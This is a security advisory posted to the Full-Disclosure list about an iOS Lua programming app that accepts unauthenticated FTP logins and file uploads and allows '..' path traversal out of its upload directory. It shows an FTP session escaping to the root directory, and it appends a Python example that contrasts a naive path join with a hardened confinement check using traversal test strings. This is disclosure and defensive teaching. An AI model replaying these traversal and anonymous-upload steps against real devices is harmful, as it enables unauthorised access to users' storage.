
[Full-disclosure] Unauthenticated Remote File Upload via HTTP for lua-Programming language 1.6 on iOS



TITLE: Unauthenticated Remote File Upload via HTTP for lua-Programming language 1.6 on iOS

Date: 8/1/2013

Author: Larry W. Cashdollar, @_larry0

Download:

1. https://itunes.apple.com/us/app/lua-programming-language/id578116006?mt=8&ls=1
2. http://www.tayutec.com/indexen.html

Description: "Please download the "lua-programming language new". And do the
following steps before using the app, you'll give me a five-star praise!!
http://sosilen.blog.163.com/blog/static/7727956620121029843220/

  - You can control the background image, and execution voice, text color and
    shadow, the number and the order of the main interface of the tab bar to
    create your learning software.
  - You can enter Lua code by keyboard, and then you can execute the Lua code.
  - You can save Lua code and learning materials, and can be modified to the
    save file and delete the save file.
  - You can learn Lua knowledge, the system provides some basic learning
    materials.
  - You can use Lua code or learning materials to generate two-dimensional
    code, for easy sharing."

One of the features is the ability to upload files via FTP and HTTP when
'Computer<->This machine' is selected.

Vulnerabilities: 'iOSftp' and HTTP unauthenticated file uploads. The
application is sandboxed, but any remote user can read/write to the device's
storage. The uploaded content is served out of the HTTP server's directory.
While the HTTP server doesn't process server-side scripts, it is possible to
upload and serve malicious / illegal content. I would think it's also possible
to fill up the device's storage as well, but did not test it.

The FTP server on port 10000 prompts for a password but accepts any username
with an empty password, and CWD is not confined to the Documents/ftp directory
the session starts in:

larry$ ftp 192.168.0.31  10000
Connected to 192.168.0.31.
220 iosFtp server ready.
Name (192.168.0.31:larry): anyone
331 Password required for anyone
Password: 
230 User anyone logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /private/var/mobile/Applications/9004C5D8-8154-406A-8D04-CE1C035BF813/Documents/ftp *
ftp> cd ../../../../
250 CWD command successful.
ftp> pwd
Remote directory: /private/var/mobile
ftp> cd /
250 CWD command successful.
ftp> pwd
Remote directory: /
ftp> 

* You also get path disclosure: PWD returns the full sandbox path, including
  the application's container UUID.

The HTTP server listening on port 8080 allows arbitrary file writes to storage.
You can create directories outside the upload path through the file upload web
interface and the '..' bug.

Because the application is sandboxed I was unable to overwrite application
executables and components, so impact is limited. As stated above, you can
serve malicious content (javascript/html) via HTTP.

[Screenshot of the web upload interface: http://vapid.dhs.org/advisories/webint.gif]

After uploading hi.html through the web interface it's served off the HTTP
server:

larry$ curl http://192.168.0.15:8080/hi.html
<html>
Hello, This is an HTML page
</html>

Vendor: Notified 8/1/2013, https://twitter.com/tayutec

Advisory: http://vapid.dhs.org/advisories/lua-ios-Huang-XiaoWen.html
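The root cause shared by the FTP 'cd ../../../../' escape and the '..' bug in the web upload form is a server that joins a client-supplied path onto its document root without confining the result. The following is an added example, not code from this advisory or from the vendor's app: a string-level model of the naive join beside a hardened version, plus an FTP CWD/PWD state machine that replays the transcript above in both modes. The names (resolve_unsafe, confine, FtpSession), the '/srv/www' root and the upload file names are constructed for the example; the sandbox path is the one PWD disclosed in the transcript.

```python
# Added example (not the advisory's or the vendor's code): how a file server
# should confine client-supplied paths to its document root, beside the naive
# join that lets '..' escape.  The '/srv/www' root and upload names are
# constructed; the sandbox path below is the one disclosed by PWD in the advisory.
import posixpath


class PathEscapesRoot(ValueError):
    """Raised when a client-supplied path would resolve outside the served root."""


def resolve_unsafe(base, client_path):
    """Naive handler: join and normalise.  Each '..' walks one level out of
    `base`, which is what 'cd ../../../../' did on the FTP server and what the
    '..' bug in the web upload form allows."""
    return posixpath.normpath(posixpath.join(base, client_path))


def confine(root, client_path):
    """Hardened handler: resolve `client_path` relative to `root` and refuse
    anything that lands outside it.  Comparing against root + '/' means a
    sibling such as '/srv/www-evil' is not mistaken for a child of '/srv/www'.
    Percent-decoding must happen before this call; on a real filesystem apply
    os.path.realpath() to both sides as well so symlinks cannot bypass it."""
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, client_path.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        raise PathEscapesRoot(client_path)
    return candidate


def escapes(root, client_path):
    """True if confine() would reject `client_path` for this root."""
    try:
        confine(root, client_path)
    except PathEscapesRoot:
        return True
    return False


class FtpSession:
    """CWD/PWD state of an FTP server.  confined=False reproduces the transcript
    in the advisory; confined=True keeps the client inside a virtual tree whose
    '/' is the document root, so '..' at the top is absorbed and PWD never
    discloses the real sandbox path."""

    def __init__(self, root, confined=True):
        self.root = posixpath.normpath(root)
        self.confined = confined
        self.cwd = self.root          # real path on disk

    def _virtual_cwd(self):
        return self.cwd[len(self.root):] or "/"

    def change_dir(self, arg):
        if self.confined:
            # normpath of an absolute virtual path never keeps '..' components
            virtual = posixpath.normpath(posixpath.join(self._virtual_cwd(), arg))
            self.cwd = confine(self.root, virtual)
        else:
            self.cwd = resolve_unsafe(self.cwd, arg)
        return self.cwd

    def pwd(self):
        return self._virtual_cwd() if self.confined else self.cwd


if __name__ == "__main__":
    # Constructed replay of the advisory's FTP session against both models.
    SANDBOX_FTP = ("/private/var/mobile/Applications/"
                   "9004C5D8-8154-406A-8D04-CE1C035BF813/Documents/ftp")
    for confined in (False, True):
        s = FtpSession(SANDBOX_FTP, confined=confined)
        print("confined" if confined else "as shipped")
        for cmd in ("../../../../", "/"):
            s.change_dir(cmd)
            print("  cd %-12s -> pwd %s" % (cmd, s.pwd()))
    # The web upload form's '..' bug, as seen by the hardened handler.
    for name in ("hi.html", "sub/../hi.html", "../../etc/passwd", "../www-evil/x"):
        verdict = "rejected" if escapes("/srv/www", name) else confine("/srv/www", name)
        print("  upload %-18s -> %s" % (name, verdict))
```

The confined session gives FTP chroot-style semantics (cd .. at the virtual root stays at the root) while the upload handler rejects traversal outright; both are acceptable, but a rejection is the safer default for an upload form because it also catches prefix and sibling-directory tricks that a silent remap would hide.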
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/